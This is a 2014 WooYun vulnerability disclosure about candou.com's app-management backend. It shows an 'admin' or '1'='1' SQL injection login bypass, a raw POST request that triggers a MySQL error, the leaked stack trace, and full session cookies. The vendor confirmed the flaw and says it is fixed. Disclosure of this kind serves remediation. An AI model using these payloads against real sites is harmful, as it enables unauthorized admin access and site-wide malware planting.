当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070727

漏洞标题:蚕豆网应用管理后台SQL注射可导致全站挂马

相关厂商:蚕豆网

漏洞作者: mango

提交时间:2014-08-02 14:23

修复时间:2014-09-16 14:24

公开时间:2014-09-16 14:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-02: 细节已通知厂商并且等待厂商处理中
2014-08-05: 厂商已经确认,细节仅向厂商公开
2014-08-15: 细节向核心白帽子及相关领域专家公开
2014-08-25: 细节向普通白帽子公开
2014-09-04: 细节向实习白帽子公开
2014-09-16: 细节向公众公开

简要描述:

详细说明:

http://appgame.candou.com
admin' or '1'='1
admin' or '1'='1
直接进入后台

K0EN{{4{M7MQALW%E(C~L@0.jpg


H%KNEV%U)O[2GXXIE@(0KCX.jpg


如果我直接编辑添加游戏神马的~~你懂得挂马什么的。。。你们全站权限基本都在这了。

漏洞证明:

后台还有个注入

POST /iphone/home/search HTTP/1.1
Host: appgame.candou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
DontTrackMeHere: gzip, deflate
Referer: http://appgame.candou.com/iphone/home/search
Cookie: FBMD_af83_saltkey=LVYbgnY1; FBMD_af83_lastvisit=1406952229; FBMD_af83_sid=UO1Z31; FBMD_af83_lastact=1406959118%09user.php%09; FBMD_af83_st_p=0%7C1406955874%7Cf8aca706683ba6cfbc79f2fffe4753c9; FBMD_af83_visitedfid=49; FBMD_af83_viewid=tid_10100; FBMD_af83_home_diymode=1; FBMD_af83_ulastactivity=e864H98QCz%2Faky5%2Bn952RcOf2CNnIpaKn%2B%2Fv6zjMaWK%2B9et2JkSk; FBMD_af83_auth=20aeDXDgSiV%2FtMoaTnTTRdoWlgwu2WqQwck2aUkgzlOESyH3nOtzvLDuwDUx2O%2FstFVgvVlYRrYGpKrsLMLsYO4; FBMD_af83_lastcheckfeed=194%7C1406956137; FBMD_af83_lip=61.232.3.8%2C1406958708; FBMD_af83_security_cookiereport=29fdKRVVmcDsO6u2JmCONR%2BWCR5foOYR6u29EQkRFPk2j16EDJrI; FBMD_af83_sina_bind_194=-1; c85272602367782310589=4350V66KbTH1537G0HclPaGnqFpPyBrycQqQ7hnGvkG%2BwGFYcW3dc86tRFexfrB5AUFEs8VsfCyiqGJbISMd0Nn8GO9UqmDCSNRc1Oym3QJ6wA8zR5MwY3hKKjedsYBkKYiI1FTUultqO5CqVtQWm9AROnI2BHSiiAR6ZPpvmmp1xmLRWYjqTsgemVWSLZcIECCKS4UH76h72wCqqaT32IeX3EjM3UCnf7V5I%2BN6ofTGvBMznTw%2BLVVsQD0TVOpJBLN5mUWxEl%2FP69H33f5g0eksxwY0jOfLIHBXC56lARDEjxTwSWuf170ZvSY39HbrL5Elom0NnvyUvV5%2BnJ1mXXJpeWBLOagj41AsoVGHwyH%2Fjbvuj3OALKPk%2BHxUhaVf%2BV1BdP8ssQGf0hNIJLWk4Uz2wer5vshTwVJxfZDVp%2FbE6PhZKhnfk1n3C7q4GOIERbZoVlNJPQu0oKQVYM0kDlLrwT%2BhDSr3H6Y8SyIz9m3L1DUgWwAnfH2BCnBaXOufhc5r0DgHtZYH3IrLxUB%2FWRPGkR%2BTjqzjit0j9VwIHbCYgxmRd0KBHK8fFQhXJ0JwsxWmu1W3HlGD; FBMD_af83_connect_is_bind=1; FBMD_af83_nofavfid=1; FBMD_af83_checkupgrade=1; PHPSESSID=jijeolqm8helfu24eoog3fidl1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
at=id&search=#


HTTP/1.1 500 Internal Server Error
Server: nginx
Date: Sat, 02 Aug 2014 06:06:54 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.5.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2805
<pre><br>object(Sow\sys\Exception)#15 (8) {
  ["string":"Exception":private]=>
  string(0) ""
  ["file":protected]=>
  string(25) "/web/lib/Sow/mysql/db.php"
  ["line":protected]=>
  int(287)
  ["trace":"Exception":private]=>
  array(6) {
    [0]=>
    array(6) {
      ["file"]=>
      string(25) "/web/lib/Sow/mysql/db.php"
      ["line"]=>
      int(89)
      ["function"]=>
      string(15) "_throwException"
      ["class"]=>
      string(12) "Sow\mysql\db"
      ["type"]=>
      string(2) "->"
      ["args"]=>
      array(0) {
      }
    }
    [1]=>
    array(6) {
      ["file"]=>
      string(39) "/web/site/appgame/www/models/Iphone.php"
      ["line"]=>
      int(203)
      ["function"]=>
      string(5) "query"
      ["class"]=>
      string(12) "Sow\mysql\db"
      ["type"]=>
      string(2) "->"
      ["args"]=>
      array(1) {
        [0]=>
        string(297) "select `application_id` AS 'AppID', `alias`AS 'AppName',`current_version` AS 'AppVersion' ,`category_id`  AS 'AppCategory',`downloads` AS 'AppDownloadCount', `release_date` as 'AppUpdateTime', `display_order2` as 'DisplayOrder' FROM `tb_application` where `status`='publish' and `application_id`=#"
      }
    }
    [2]=>
    array(6) {
      ["file"]=>
      string(57) "/web/site/appgame/www/modules/Iphone/controllers/Home.php"
      ["line"]=>
      int(241)
      ["function"]=>
      string(6) "search"
      ["class"]=>
      string(12) "Iphone_Model"
      ["type"]=>
      string(2) "::"
      ["args"]=>
      array(4) {
        [0]=>
        string(2) "id"
        [1]=>
        string(1) "#"
        [2]=>
        string(1) "1"
        [3]=>
        string(2) "15"
      }
    }
    [3]=>
    array(4) {
      ["function"]=>
      string(12) "searchAction"
      ["class"]=>
      string(15) "Home_Controller"
      ["type"]=>
      string(2) "->"
      ["args"]=>
      array(0) {
      }
    }
    [4]=>
    array(6) {
      ["file"]=>
      string(20) "/web/lib/Sow/bug.php"
      ["line"]=>
      int(122)
      ["function"]=>
      string(3) "run"
      ["class"]=>
      string(15) "Yaf\Application"
      ["type"]=>
      string(2) "->"
      ["args"]=>
      array(0) {
      }
    }
    [5]=>
    array(6) {
      ["file"]=>
      string(31) "/web/site/appgame/www/index.php"
      ["line"]=>
      int(20)
      ["function"]=>
      string(4) "http"
      ["class"]=>
      string(7) "Sow\bug"
      ["type"]=>
      string(2) "::"
      ["args"]=>
      array(0) {
      }
    }
  }
  ["message":protected]=>
  string(146) "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1"
  ["code":protected]=>
  int(1064)
  ["previous":protected]=>
  NULL
  ["previous":"Exception":private]=>
  NULL
}
<hr></pre>

修复方案:

版权声明:转载请注明来源 mango@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-08-05 16:36

厂商回复:

感谢,已经处理,老旧系统存在多处漏洞!

最新状态:

暂无